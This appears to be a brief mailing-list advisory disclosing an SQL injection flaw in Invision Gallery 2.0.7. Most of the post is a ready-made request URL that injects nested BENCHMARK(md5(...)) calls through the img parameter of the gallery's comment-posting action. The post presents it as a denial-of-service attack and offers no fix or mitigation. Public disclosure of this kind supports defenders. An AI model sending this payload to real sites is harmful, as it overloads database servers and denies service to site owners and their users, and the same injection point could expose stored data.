<<< Date Index >>>     <<< Thread Index >>>

Invision Gallery 2.0.7 SQL Injection Vulnerability



Invision Gallery 2.0.7 

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 
OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM 
ipb_gallery_images )